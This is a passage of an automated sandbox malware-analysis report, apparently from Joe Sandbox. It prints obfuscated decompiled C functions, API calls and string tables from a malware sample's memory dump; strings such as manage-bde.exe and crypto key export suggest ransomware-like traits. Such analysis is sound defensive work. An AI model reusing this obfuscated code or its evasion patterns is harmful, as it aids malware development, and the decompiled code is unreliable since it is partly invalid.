Instruction Fuzzy Hash: 0A42F266E443819FC700DF79FC946EA3BB2EB7A324B08407BD84497366E2790A55C76C

Uniqueness

Uniqueness Score: -1.00%

Function 004AE87C Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 252encryptionCOMMON

Download Yara Rule

APIs

CryptExportKey.ADVAPI32(?), ref: 004AE93C
CryptDestroyKey.ADVAPI32(?), ref: 004AEB3C

Strings

mssip32.dll, xrefs: 004AEBF5
PortableDeviceWMDRM.dll, xrefs: 004AE8AC, 004AEA4C
psapi.dll, xrefs: 004AE8F5
MXEAgent.dll, xrefs: 004AE95F
KBDBGPH.DLL, xrefs: 004AE9E3
CNBBR334.DLL, xrefs: 004AEA72
scavengeui.dll, xrefs: 004AEC8B, 004AEC8C
disrvpp.dll, xrefs: 004AE8A0, 004AEB45

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: Crypt$DestroyExport
String ID: CNBBR334.DLL$KBDBGPH.DLL$MXEAgent.dll$PortableDeviceWMDRM.dll$disrvpp.dll$mssip32.dll$psapi.dll$scavengeui.dll
API String ID: 1968005654-1440041623
Opcode ID: 0483689bb84a9436742240f3adb7e05517b48d21d45d686a450ce7c7065326d4
Instruction ID: 4c39d5811204318d0962fbd3db8badf6700b9e7fde37cfdba1d4f2186649c6fa
Opcode Fuzzy Hash: 0483689bb84a9436742240f3adb7e05517b48d21d45d686a450ce7c7065326d4
Instruction Fuzzy Hash: 1D91D125E542458FDB00DF7AEC942E93BB2EF3A310B44407BCA54D7362E2790A5AC768

Uniqueness

Uniqueness Score: -1.00%

Function 004DA0DA Relevance: 15.3, Strings: 12, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E004DA0DA(intOrPtr _a4, intOrPtr _a16) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				char* _v124;
				char* _t62;
				char* _t64;
				char* _t67;
				char* _t71;
				char* _t72;
				char* _t74;
				char* _t84;
				void* _t94;
				void* _t101;
				intOrPtr _t103;
				char* _t114;
				void* _t157;
				signed short _t159;
				signed int _t171;
				signed short _t174;
				short _t178;
				intOrPtr _t179;
				signed int _t181;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t195;
				signed int _t197;
				signed int _t198;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;

				_t190 = _t189 + 0xf1c5;
				_v8 = _t62;
				_t64 = _v8;
				if(_t94 > 0x3e) {
					L5:
					L6:
					 *0x4fd0fa =  *0x4fd0fa + 0x3f2476;
					_t159 = _t157 + _t157 + 0x5b6d7f;
					L7:
					 *0x4fd194 = _t159;
					_t174 = 0x9d21;
					 *0x4febfb =  *0x4febfb - 0x9d21;
					_t197 = 0xffffffffffff3390;
					 *0x4fff1d =  *0x4fff1d - _t64;
					_push(0x3c);
					_t191 = _t190 + _t190;
					_t101 =  *0x4fd45f - 0x19;
					_v8 = _t64;
					if(_t101 >= 0x31) {
						L12:
						if(_t64 > 0x221d) {
							_v16 = _v16 - 0x2cbd4d;
							_t159 =  *0x4fd11a; // 0x7c
						}
						 *0x4fd168 = _t159;
						_t159 = _t159 + _t159;
						_t174 = 0x9861;
						L15:
						if((_t174 & 0x000000a3) >= 0) {
							_t64 = 0xcb;
						}
						_t198 = _t197 & 0x0000cf92;
						_t67 =  &_v120;
						if(_t198 < 0) {
							L20:
							_v8 =  &(_v8[_t67]);
							_t103 = _v12;
							 *0x4fff12 =  *0x4fff12 - _t103;
							 *0x4fd0d8 =  *0x4fd0d8 + _t103;
							if(_t159 > _t159) {
								_v28 = _v28 - _t159;
							}
							 *0x4fd18a = _t159;
							_t159 = _t174;
							 *0x4fd20a = 0x9a78;
							_t174 = 0x9a78 - _t67;
							_t198 = _t198 + _t198;
							goto L23;
						} else {
							if(_t67 < 0) {
								L23:
								_t199 = _t198 + 0xc1e4;
								 *0x4fff1b =  *0x4fff1b - _t67;
								if(_t191 <= 0) {
								}
								 *0x4fff10 = _t67;
								_v124 = _t67;
								_push(_v124);
								_v8 = _t67;
								_t71 = _v8;
								_v24 = _t159;
								if(_t159 <= _t159) {
									L28:
									if(_t71 < 0x11c6) {
										goto L33;
									}
									if(_t71 < 0x22) {
										 *0x4fff12 =  *0x4fff12 + "speechuxcpl.dll" + 0x32;
									}
									_t159 = _v24;
									 *0x4fd168 = _t159;
									goto L32;
								} else {
									_t159 = 0x6f57;
									_v32 = _v32 - 0x6f57;
									 *0x4fd1b2 = _t174;
									_t174 = 0x9ea6;
									 *0x4fd21a =  *0x4fd21a - 0x9ea6;
									 *0x4fff19 =  *0x4fff19 - _t71;
									_t199 = _t199 + _t199 + 0xc612;
									if(_t71 != 0) {
										L32:
										_t174 =  *0x4fd19a; // 0x8f85
										L33:
										_t178 = _t174 - 0x8fed;
										 *0x4fd200 = _t178;
										_t114 =  *0x4fff19; // -107
										_t200 = _t199 + 0xb759;
										_t72 = E0049D211(_t114, _t191, _t200);
										if(_t191 == 0) {
											L38:
											 *0x4fd208 = _t178;
											 *0x4fff19 = _t72;
											 *0x4fff1b =  *0x4fff1b - _t72;
											 *0x4fd6cf =  *0x4fd6cf + _t200;
											_t191 = 0x4fd719;
											if(0x4fd719 < 0) {
												L40:
												L41:
												 *0x4fd13c = _t159;
												L42:
												if(_t159 == _t159) {
													_t159 = _t159 - 1;
												}
												 *0x4fd1d6 = _t178;
												_t179 =  *0x4fd20e; // 0xa975
												_t201 = _t200 - 0xb299;
												_v120 = 0x3c;
												_v8 = _t72;
												_t74 = _v8;
												_v24 = _v24 - _t159;
												_v116 = 0x500;
												_v112 = 0;
												 *0x4fd13a =  *0x4fd13a;
												if(0 < 0) {
													 *0x4fe943 =  *0x4fe943 + _t179;
												}
												_t202 = _t201 + 0x9faabe;
												_v8 = _t74;
												_v20 = 0x3d9afe;
												_push(_a16);
												_push(E004DA4AF);
												_t181 =  *0x4fd1a0; // 0xa2
												_t84 = "msmpeg2adec.dll";
												if((_t181 & 0x00757f5f) == 0) {
													L53:
													 *0x4fff19 = _t84;
													_push(_a4);
													_push(0x8730);
													_push(E004DB3CC);
													goto __edx;
												} else {
													 *0x4fedf3 =  *0x4fedf3 + _t202;
													if(_t202 <= 0) {
														L52:
														_t84 =  *0x4fff1e; // 0x3
														 *0x4fd1c4 = 0xaa6e;
														goto L53;
													}
													if(_t202 == 0) {
														_t84 = 0xdd;
													}
													goto L52;
												}
											}
											L39:
											 *0x4fd3bb =  *0x4fd3bb + _t72;
											goto L40;
										}
										_v8 = _t72;
										if(0x352c26 != 0x352c26) {
											goto L42;
										}
										if(0x352c26 > 0x352c26) {
											goto L41;
										}
										_t159 = _t159 + 0x588771;
										 *0x4fd156 =  *0x4fd156 - _t159;
										 *0x4fd18a = _t159;
										if((_t159 & 0x0000823f) > 0) {
											goto L39;
										}
										_t178 = _t178 - 1;
										goto L38;
									}
									goto L28;
								}
							}
							_t191 = 0;
							goto L20;
						}
					}
					if(_t101 != _t101) {
						L11:
						 *0x4fd1b4 = _t174;
						_t174 = _t174 + 0x87bacb - 1;
						 *0x4fff19 = _t64;
						_t197 = 0x4fff1b;
						 *0x4fff1d = _t64;
						_t191 = _t191 - 0x293;
						_t64 = "LogonUserExA";
						goto L12;
					}
					if(_t101 + 0x5060 > _t101 + 0x5060) {
						goto L15;
					}
					_t159 =  *0x4fd14e; // 0x6f05
					goto L11;
				}
				_t159 = 0x76c6a9;
				 *0x4fff17 =  *0x4fff17 - _t171;
				if((_t171 & 0x0084eb2e) != 0) {
					goto L7;
				}
				_t171 =  *0x4fd210; // 0xa957
				 *0x4ff4b3 =  *0x4ff4b3 - _t195;
				if(_t190 >= 0) {
					 *0x4fff1e = _t64;
				}
				if(_t64 >= 7) {
					goto L6;
				} else {
					goto L5;
				}
			}

0x004da0da
0x004da0df
0x004da0e7
0x004da0ed
0x004da136
0x004da140
0x004da145
0x004da14e
0x004da154
0x004da154
0x004da164
0x004da168
0x004da172
0x004da177
0x004da17d
0x004da17f
0x004da187
0x004da18a
0x004da190
0x004da1d7
0x004da1dd
0x004da1e4
0x004da1ec
0x004da1ec
0x004da1f3
0x004da1fa
0x004da201
0x004da205
0x004da208
0x004da212
0x004da212
0x004da214
0x004da21f
0x004da225
0x004da237
0x004da237
0x004da23c
0x004da23f
0x004da245
0x004da253
0x004da255
0x004da255
0x004da258
0x004da25f
0x004da26d
0x004da274
0x004da276
0x00000000
0x004da227
0x004da22b
0x004da278
0x004da278
0x004da27d
0x004da286
0x004da286
0x004da292
0x004da29c
0x004da2a4
0x004da2a7
0x004da2c8
0x004da2d0
0x004da2d5
0x004da314
0x004da31d
0x00000000
0x00000000
0x004da321
0x004da326
0x004da32f
0x004da331
0x004da334
0x00000000
0x004da2d7
0x004da2d7
0x004da2db
0x004da2de
0x004da2ec
0x004da2f0
0x004da2f7
0x004da2ff
0x004da308
0x004da33e
0x004da33e
0x004da345
0x004da345
0x004da34a
0x004da351
0x004da357
0x004da35c
0x004da364
0x004da39f
0x004da39f
0x004da3a6
0x004da3b4
0x004da3ba
0x004da3c6
0x004da3ce
0x004da3d6
0x004da3db
0x004da3e9
0x004da3f0
0x004da3f2
0x004da3f4
0x004da3f4
0x004da3f5
0x004da3ff
0x004da406
0x004da40b
0x004da419
0x004da42b
0x004da42e
0x004da43a
0x004da444
0x004da44b
0x004da457
0x004da459
0x004da459
0x004da466
0x004da46c
0x004da47b
0x004da492
0x004da4a0
0x004db348
0x004db357
0x004db36d
0x004db3a1
0x004db3a1
0x004db3af
0x004db3bf
0x004db3c0
0x004db3ca
0x004db36f
0x004db376
0x004db37e
0x004db38a
0x004db38a
0x004db390
0x00000000
0x004db39a
0x004db382
0x004db384
0x004db386
0x00000000
0x004db388
0x004db36d
0x004da3d0
0x004da3d0
0x00000000
0x004da3d0
0x004da36b
0x004da37a
0x00000000
0x00000000
0x004da37e
0x00000000
0x00000000
0x004da383
0x004da389
0x004da390
0x004da39c
0x00000000
0x00000000
0x004da39e
0x00000000
0x004da39e
0x00000000
0x004da30e
0x004da2d5
0x004da230
0x00000000
0x004da232
0x004da225
0x004da194
0x004da1a8
0x004da1a8
0x004da1b5
0x004da1b6
0x004da1be
0x004da1c4
0x004da1cd
0x004da1d2
0x00000000
0x004da1d2
0x004da19d
0x00000000
0x00000000
0x004da1a1
0x00000000
0x004da1a1
0x004da0fc
0x004da102
0x004da10e
0x00000000
0x00000000
0x004da110
0x004da119
0x004da129
0x004da12b
0x004da12b
0x004da134
0x00000000
0x00000000
0x00000000
0x00000000

Strings

v$?, xrefs: 004DA140
manage-bde.exe, xrefs: 004DA2BF, 004DA41C
speechuxcpl.dll, xrefs: 004DA314
KBDBGPH.DLL, xrefs: 004DA49B
CoRevokeInitializeSpy, xrefs: 004DA2AF
CNHI06S.DLL, xrefs: 004DA136
LogonUserExA, xrefs: 004DA1D2
&,5, xrefs: 004DA373
>, xrefs: 004DA0EA
<, xrefs: 004DA40B
user.exe, xrefs: 004DA3DB
^kS, xrefs: 004DA0F2

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: &,5$<$>$CNHI06S.DLL$CoRevokeInitializeSpy$KBDBGPH.DLL$LogonUserExA$^kS$manage-bde.exe$speechuxcpl.dll$user.exe$v$?
API String ID: 0-4030965862
Opcode ID: 6f2b1232a9b13a5d8d002cd885aaf727dbbe46e8fea227daf70ea0331ef825e8
Instruction ID: 18f0f61da80ea4566af36359c9907b9ba99e7767347d629d266639e959307642
Opcode Fuzzy Hash: 6f2b1232a9b13a5d8d002cd885aaf727dbbe46e8fea227daf70ea0331ef825e8
Instruction Fuzzy Hash: EDA1A065E443458FCB00DFB9E8A42ED7BB2EF2A314F44407B8A5497322E3790A65C75E

Uniqueness

Uniqueness Score: -1.00%

Function 004C9255 Relevance: 12.8, Strings: 10, Instructions: 262
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004C9255(void* __ebx, signed short __edx, signed int __edi, void* __esi) {
				signed int _v0;
				char _v8;
				intOrPtr _v8252;
				intOrPtr _v8256;
				intOrPtr _v8264;
				intOrPtr _v8276;
				intOrPtr _v8280;
				intOrPtr* _t34;
				char _t35;
				intOrPtr _t36;
				char _t37;
				char _t42;
				intOrPtr _t43;
				char _t44;
				char _t47;
				char _t49;
				void* _t54;
				void* _t57;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t98;
				void* _t102;
				short _t121;
				signed short _t129;
				void* _t132;
				signed short _t133;
				short _t135;
				signed int _t137;
				intOrPtr _t143;
				signed int _t144;

				_t144 = __edi;
				_t129 = __edx;
				_t58 = __ebx;
				_pop(_t34);
				if(_t34 >= 0) {
					__ebx = 0x14054e;
					 *0x4fd927 =  *0x4fd927 + __eax;
					if(__bx != 0x35dc) {
						0x3e72db = "MXEAgent.dll";
						__cx =  *0x4fd142; // 0x63d5
						 *0x4fd178 =  *0x4fd178 - __cx;
						 *0x4fd190 =  *0x4fd190 + __cx;
						__dh = __dh + __dh;
						__ebx = 0x15e50c;
					}
					 *0x4fd97b =  *0x4fd97b + __eax;
					 *0x4fdaa3 = __eax;
					__bx = 0;
					__bl = __bl - 0x49;
				}
				 *0x4fff15 =  *0x4fff15 + _t58;
				if(_t121 >= _t121) {
					_t121 = _t121 + 1;
					 *0x4fd1b2 = _t129;
					_t143 =  *0x4fd1fc; // 0x0
					_t129 = _t143 - 0xa9;
					 *0x4fff19 = _t34;
				}
				_t153 = 0x4ff878;
				 *0x4fff1d = _t34;
				_t35 =  *_t34;
				 *0x4fd1d0 = _t129;
				if((_t129 & 0x000098a7) <= 0) {
					_t153 =  !0x4ff878;
					 *0x4fd715 =  *0x4fd715 + _t144;
					_t144 = _t144 + _t144 + 0x3e4;
				}
				_v8 = _t35;
				 *0x4fd19e = _t121;
				_t36 = _v8;
				_t64 =  *0x4fd8df; // 0x1723
				 *0x4fdb33 =  *0x4fdb33 + _t64;
				 *0x4fff12 =  *0x4fff12 + _t64;
				_v8280 = _t36;
				_t132 = 0xfffffffffffff2a3;
				_t37 = _t36;
				_v8252 = 0;
				_v8256 = 0;
				 *0x4fff19 = _t37;
				 *0x4fff1d = 0xda;
				_t42 = _t37;
				if(_t42 <= 0x98954) {
					L16:
					goto L17;
				} else {
					 *0x4fd03a =  *0x4fd03a + _t42;
					if(_t121 == _t121) {
						 *0x4fd16a = _t121;
						if(_t121 != _t121) {
							L14:
							if(_t144 > 0) {
								 *0x4fff1e = _t42;
								goto L16;
							}
						} else {
							_t132 = 0x88c8;
							if(0x8888 >= 0) {
								_t132 = 0;
								_t153 = _t153 + _t144;
								goto L14;
							}
						}
						L17:
					}
				}
				_t122 = 0;
				_v8264 = 0;
				_v8 = _t42;
				 *0x4fff18 =  *0x4fff18 + _t132;
				_t133 = _t132 + _t153;
				_t43 = _v8;
				_v8276 = 0;
				 *0x4fd55b = _t43;
				_v8 = _t43;
				 *0x4fd19c = _t133;
				_t44 = _v8;
				if(_t44 < 0x183a9b) {
					L21:
					 *0x4fff1b = _t44;
					 *0x4ffec4 =  *0x4ffec4 - _t144;
				} else {
					_t102 = "rdpwsx.dll" - 1;
					 *0x4fff12 =  *0x4fff12 + _t102;
					if(_t102 < _t102) {
						_t122 =  *0x4fd19e; // 0x1d10
						 *0x4fd1ec = 0x8965;
						_t133 = 0 + _t44;
						_t153 = _t153 + 0xa5a7c7;
						goto L21;
					}
				}
				_t85 =  *0x4fd5f3; // 0x7453a930
				_t86 = _t85 + 0x203cbc;
				 *0x4fff12 =  *0x4fff12 - _t86;
				if(_t86 == 0x33b6) {
					_t86 = 0x439807;
				}
				_v8 = _t122;
				if(_v8280 != 1) {
					if(_t144 < 0) {
						L32:
						 *0x4fdc8b =  *0x4fdc8b + _t86;
						if(_t86 + _t86 <= 0x72c9) {
							 *0x4fd172 = 0xd701;
							goto L34;
						}
					} else {
						if(_t144 > 0) {
							L29:
							if(_t44 < 0x2b) {
								 *0x4fdc37 = _t86;
							}
							 *0x4fff1d = _t44;
							_t144 = _t144 - 0x00c30439 ^ 0x00d83aff;
							 *0x4fd4f3 =  *0x4fd4f3 - _t44;
							 *0x4fd61f = _t44;
							_t98 =  *0x4fd903; // 0x1
							_t86 = _t98 - 0x286267;
							goto L32;
						} else {
							 *0x4fff10 =  *0x4fff10 + _t44;
							if(_t44 >= 0x1349) {
								L34:
								_t133 = 0x8ba4;
							} else {
								goto L29;
							}
						}
					}
					if((_t133 & 0x00009b69) < 0) {
						 *0x4fd20e = _t133;
						 *0x4fff1b =  *0x4fff1b + _t44;
						 *0x4fd214 = _t133 - 0x90 + 1;
						_t133 = _t153 + 0x0000b310 & 0x00780afe;
					}
					 *0x4fff1d = _t44;
					_v8 = E004B9910();
					_t135 =  *0x4fd200; // 0x3597
					_t47 = _v8;
					 *0x4fd777 = _t47;
					 *0x4fff19 = _t47;
					_t49 = _t47;
					 *0x4fff1e = _t49;
					_v8 = _t49;
					 *0x4fff17 =  *0x4fff17 - _t135;
					 *0x4fd1ea = _t135;
					_push(0x100);
					_push(E004CAA9F);
					_t137 = 1 +  *0x4ff998 * 0x8088405;
					 *0x4ff998 = _t137;
					_push(_v0 * _t137 >> 0x20);
					_pop(_t54);
					return _t54;
				} else {
					_t57 = _t44;
					_push("833FF66072D7F8758584E32EE34DE874");
					_push(E004C9549);
					_push(E004A5B43);
					return _t57;
				}
			}

0x004c9255
0x004c9255
0x004c9255
0x004c925f
0x004c9262
0x004c926a
0x004c926f
0x004c927a
0x004c9281
0x004c9289
0x004c9290
0x004c9297
0x004c929e
0x004c92a3
0x004c92a3
0x004c92a8
0x004c92ae
0x004c92b3
0x004c92b6
0x004c92b6
0x004c92b9
0x004c92c2
0x004c92c7
0x004c92c8
0x004c92d2
0x004c92d9
0x004c92dc
0x004c92dc
0x004c92e4
0x004c92ea
0x004c92ff
0x004c9301
0x004c930d
0x004c9311
0x004c931d
0x004c9326
0x004c932b
0x004c9330
0x004c9333
0x004c9348
0x004c9351
0x004c9357
0x004c935d
0x004c936b
0x004c9372
0x004c9377
0x004c9378
0x004c9390
0x004c93a1
0x004c93b5
0x004c93bc
0x004c93c4
0x004c9431
0x00000000
0x004c93c6
0x004c93c6
0x004c93e5
0x004c93e7
0x004c93f0
0x004c9410
0x004c9419
0x004c941b
0x00000000
0x004c942c
0x004c93f2
0x004c93f2
0x004c93fc
0x004c93fe
0x004c940d
0x00000000
0x004c940d
0x004c93fc
0x004c943c
0x004c943c
0x004c93e5
0x004c9441
0x004c9443
0x004c9450
0x004c9453
0x004c9459
0x004c945b
0x004c945e
0x004c9469
0x004c9487
0x004c948a
0x004c9494
0x004c94a1
0x004c94d8
0x004c94d8
0x004c94e8
0x004c94a3
0x004c94a3
0x004c94a4
0x004c94ac
0x004c94bb
0x004c94c6
0x004c94d0
0x004c94d2
0x00000000
0x004c94d2
0x004c94ac
0x004c94ee
0x004c94f4
0x004c94fa
0x004c9505
0x004c9508
0x004c9508
0x004c950d
0x004c951e
0x004ca962
0x004ca9af
0x004ca9af
0x004ca9ba
0x004ca9c1
0x00000000
0x004ca9c8
0x004ca964
0x004ca967
0x004ca975
0x004ca977
0x004ca979
0x004ca979
0x004ca98d
0x004ca992
0x004ca998
0x004ca99e
0x004ca9a3
0x004ca9a9
0x00000000
0x004ca969
0x004ca969
0x004ca973
0x004ca9cf
0x004ca9cf
0x00000000
0x00000000
0x00000000
0x004ca973
0x004ca967
0x004ca9d8
0x004ca9da
0x004ca9e6
0x004ca9f6
0x004ca9fd
0x004caa00
0x004caa08
0x004caa17
0x004caa1d
0x004caa26
0x004caa2e
0x004caa3e
0x004caa4f
0x004caa50
0x004caa57
0x004caa5a
0x004caa60
0x004caa88
0x004caa90
0x004b9b07
0x004b9b08
0x004b9b10
0x004b9b11
0x004b9b13
0x004c9524
0x004c9533
0x004c9534
0x004c953e
0x004c9543
0x004c9548
0x004c9548

Strings

PortableDeviceWMDRM.dll, xrefs: 004C943C
MXEAgent.dll, xrefs: 004C9281
scrptadm.dll, xrefs: 004C9383
833FF66072D7F8758584E32EE34DE874, xrefs: 004C9534
ehshell.dll, xrefs: 004C93D8
ui, xrefs: 004C931D
CoRevokeInitializeSpy, xrefs: 004C9479
user.exe, xrefs: 004C9431
RegQueryInfoKeyW, xrefs: 004C93D3
rdpwsx.dll, xrefs: 004C9497

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: 833FF66072D7F8758584E32EE34DE874$CoRevokeInitializeSpy$MXEAgent.dll$PortableDeviceWMDRM.dll$RegQueryInfoKeyW$ehshell.dll$rdpwsx.dll$scrptadm.dll$user.exe$ui
API String ID: 0-2237635998
Opcode ID: 20f6aee4c30e705099a6cafcaf6eae1d66d8250cdb9ad846c022a06f8ed1422a
Instruction ID: 3fd14fcba24d3bc1f7ac9cee2409c20a094c9f5b8a3909ed71341965f98aae64
Opcode Fuzzy Hash: 20f6aee4c30e705099a6cafcaf6eae1d66d8250cdb9ad846c022a06f8ed1422a
Instruction Fuzzy Hash: 97A1C269A483859FC7409F74FC947E93B72EB2A304B48407BC944D7326E2390A69CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004C49F4 Relevance: 10.3, Strings: 8, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E004C49F4(void* __ebx, signed int __ecx, signed int __edx, void* __edi, short __esi) {
				char _t48;
				intOrPtr _t50;
				intOrPtr _t60;
				void* _t61;
				intOrPtr _t64;
				intOrPtr _t73;
				intOrPtr _t77;
				void* _t79;
				signed int _t85;
				intOrPtr _t97;
				char* _t109;
				void* _t123;
				signed int _t139;
				void* _t142;
				void* _t143;
				short _t157;
				signed int _t159;
				signed int _t167;
				short _t168;
				signed char _t186;
				void* _t192;
				intOrPtr _t201;
				void* _t202;
				void* _t203;
				short _t207;
				void* _t208;
				signed int _t211;
				void* _t213;

				_t207 = __esi;
				_t202 = __edi;
				_t139 = __ecx;
				_t159 = __edx;
				 *(_t213 - 8) = "Microsoft.Build.Engine.dll";
				_t109 = __ebx + 0x35b9;
				 *(_t213 - 0x14) = _t109;
				if(_t109 < __ecx) {
					_t157 = E004FD13E; // 0xca97
					 *0x4fd18e = _t157;
					_t139 = _t159;
					_t201 =  *0x4fd1c2; // 0xa957
					_t159 = _t201 - 0x84cbc9;
					 *0x4fd210 =  *0x4fd210 + _t159;
				}
				 *0x4fd228 =  *0x4fd228 + _t207;
				L004B6F0C(0, _t109, _t139, _t159, _t202, _t207, 1, _t207);
				 *0x4fff1d = L004BFEB9(_t109, _t139, _t202, _t207, 1);
				_push( *0x4fd140);
				if(_t139 <= _t139) {
					if(_t139 < _t139) {
						 *((intOrPtr*)(_t213 - 0x20)) =  *((intOrPtr*)(_t213 - 0x20)) + _t139;
						 *0x4fd1b0 = _t159;
					}
					if((_t159 & 0x0086ab87) < 0) {
					}
					 *0x4fd22e = _t207;
					 *0x4fff19 = 0;
				}
				_t48 =  *0x4fff1b; // 0x0
				_t208 = _t207 - 0xd53b;
				 *0x4fff1d = _t48;
				_t50 =  *0x4fff1e; // 0x3
				_push( *0x4fd236);
				if(_t50 > 0) {
					L11:
					 *0x4fff1e = _t50;
					goto L12;
				} else {
					_t202 = _t202 + 0xc73fba;
					 *0x4fff10 = _t50 + 0xf2;
					_t50 = 0x2ece44;
					 *(_t213 - 0x18) = _t139;
					if(_t208 > 0) {
						L12:
						if(3 == 0xb5e) {
							 *(_t213 - 8) = 3;
						}
						_t140 =  *(_t213 - 0x18);
						_push( *0x4fd0c4);
						 *(_t213 - 0x10) =  *(_t213 - 0x10) - 0x175b75a;
						 *0x4fff17 =  *0x4fff17 + 0x8a90;
						_push( *0x4fd0f8);
						if(L00461400(E004A2015(0x4ac6b0,  *(_t213 - 0x18), _t202), 0x4ac6b0,  *(_t213 - 0x18), 0x8a90, _t202, _t208, 0) >= 0x69e) {
							_t55 =  *(_t213 - 8);
							 *((intOrPtr*)(_t213 - 0xc)) =  *((intOrPtr*)(_t213 - 0xc)) -  *(_t213 - 8);
							 *(_t213 - 0x10) =  &(( *(_t213 - 0x10))[0x4ac6b0]);
						}
						_push( *0x4fd09e);
						E0049C91C(_t55, _t140, 0x8ca7, _t202, _t208, 0, 1);
						 *0x4fff10 =  *0x4fff10 - 0x7cf96;
						_push(0x7cf96);
						E004C1BE4(0x7cf96, 0x958d60, _t140, 0x8ca7);
						_t142 =  *(_t213 - 0x18) - 0x6752;
						 *0x4fd164 =  *0x4fd164 + _t142;
						_t143 = _t142 + _t142;
						_t166 = 0x798062;
						if(0x10022 >= 0) {
							_t166 =  *0x4fd230; // 0xd6ad
							 *0x4fff1b = 0xc1;
							_t202 = 0xed5b;
							 *0x4fff1e =  *0x4fff1e;
							if(0xed5b != 0x1de) {
								 *0x4fff11 =  *0x4fff11 - 0x9c0;
							}
						}
						_t167 = _t166 | 0x000087e7;
						_t60 =  *0x4fd36b; // 0xfa310e00
						_push( *0x4fd02c);
						_t61 = L0049CE88(_t60, 0x5155ca, _t143, _t167, _t208, _t143, _t143);
						if(_t143 > _t143) {
							_t143 = _t143 + 0x6d9ed3;
							_t167 = 0x821c;
							 *0x4fd1bc =  *0x4fd1bc - 0x821c;
						}
						_t168 = _t167 + _t167;
						_push(1);
						_push(_t168);
						L0045F957(_t61, _t208);
						_t64 =  *0x4fd3b7; // 0x0
						 *(_t213 - 8) =  &(( *(_t213 - 8))[_t64]);
						_push( *0x4fd090);
						if(0x5155ca <= 0x5155ca) {
							 *0x4fff15 =  *0x4fff15 + _t143;
							E004FD13E = E004FD13E + _t143;
						}
						L004B6F0C(_t64, 0x5155ca, _t143, _t168, _t202, _t208, 1, _t143);
						 *0x4fd1da = _t168;
						_push( *0x4fd062);
						 *0x4fff11 =  *0x4fff11 + 0x3850b7;
						_push( *0x4fd206);
						_t123 = 0x3399ba;
						_push( *0x4fd236);
						_t73 =  *0x4fd39f; // 0x118d
						if(_t73 < 5) {
							if(_t73 >= 0x153e) {
								_t73 = _t73 + 0x25;
								_t123 = 0x2844d3;
							}
							 *0x4fff12 =  *0x4fff12 + _t123;
						}
						_push( *0x4fd0d4);
						 *0x4fd1aa =  *0x4fd1aa + 0xffffffffffffff63;
						_push( *0x4fd03c);
						_t203 = _t202 - 1;
						 *0x4fd000 =  *0x4fd000 + 0xf0;
						_t77 =  *0x4fd563; // 0x0
						 *0x4fd1ca = 0x89;
						if(_t77 < 0) {
							L29:
							goto L30;
						} else {
							 *0x4ffad4 =  *0x4ffad4 + _t203;
							 *0x4fff1d = 0xd9;
							_t97 =  *0x4fff10; // 0x2a
							 *0x4fd036 =  *0x4fd036 + _t97 - 0x9a7;
							if("MXEAgent.dll" <= 0x3114) {
								L30:
								_t128 =  *(_t213 - 0x18);
								_t151 = 0xffffffffffffb233;
								 *0x4fd21c = 0x15cf8;
								_push( *0x4fd09e);
								_t186 = 0x99aa;
								if(0xa88c3 == 0x46660) {
									if(0xa88c3 <= 0x15) {
										 *(_t213 - 0x10) = _t128 - 0x2ed3ed;
										_t128 =  *(_t213 - 0x14);
										if( *(_t213 - 0x14) <  *(_t213 - 0x14)) {
											_t151 = 0xffffffffffffb234;
										}
										 *0x4fd158 = _t151;
									}
									_t151 =  *0x4fd18c; // 0x7a01
									_t186 = 0xaa7a;
								}
								_t79 = 0xbd;
								_t211 =  !0x4fff19;
								_push( *0x4fd0c4);
								if((_t186 & 0x00000096) < 0) {
									L39:
									 *0x4fff10 =  *0x4fff10 + _t79;
									_t128 = "CoRevokeInitializeSpy";
									 *(_t213 - 0x10) = "CoRevokeInitializeSpy";
									 *0x4fd146 =  *0x4fd146 - 0x5db9;
									_t151 = 0xbb72;
									goto L40;
								} else {
									if(0xac < 0) {
										L40:
										_push( *0x4fd09e);
										_t85 = 0;
										if(0 <= 0x23e) {
											 *0x4fd084 =  *0x4fd084 - 0x173a40;
											_t85 =  !0x00173A40;
										}
										 *0x4fd134 = _t151;
										_push( *0x4fd0ba);
										_t192 = 0x24c3e;
										if(0x20c00 < 0) {
											_t192 = 0xa0fa;
										}
										 *0x4fd220 = _t211;
										 *0x4fff19 = _t85;
										_push( *0x4fd018);
										_push(_t192);
										_push(0x4c4f18);
										_push(L004A2FCA);
										return 0x12f79b;
									}
									_t211 = 0xffffffffffffffff;
									_t79 = 0xd6;
									_t203 = 0;
									goto L39;
								}
							}
							goto L29;
						}
					}
					_t208 = _t208 + 1;
					goto L11;
				}
			}

0x004c49f4
0x004c49f4
0x004c49f4
0x004c4a01
0x004c4a0d
0x004c4a18
0x004c4a1b
0x004c4a20
0x004c4a29
0x004c4a30
0x004c4a37
0x004c4a3a
0x004c4a41
0x004c4a47
0x004c4a47
0x004c4a4e
0x004c4a58
0x004c4a66
0x004c4a6f
0x004c4a79
0x004c4a7d
0x004c4a7f
0x004c4a82
0x004c4a82
0x004c4a8f
0x004c4a8f
0x004c4a95
0x004c4a9c
0x004c4a9c
0x004c4aa2
0x004c4aa8
0x004c4aad
0x004c4ab4
0x004c4aba
0x004c4ac3
0x004c4b0d
0x004c4b0d
0x00000000
0x004c4ac5
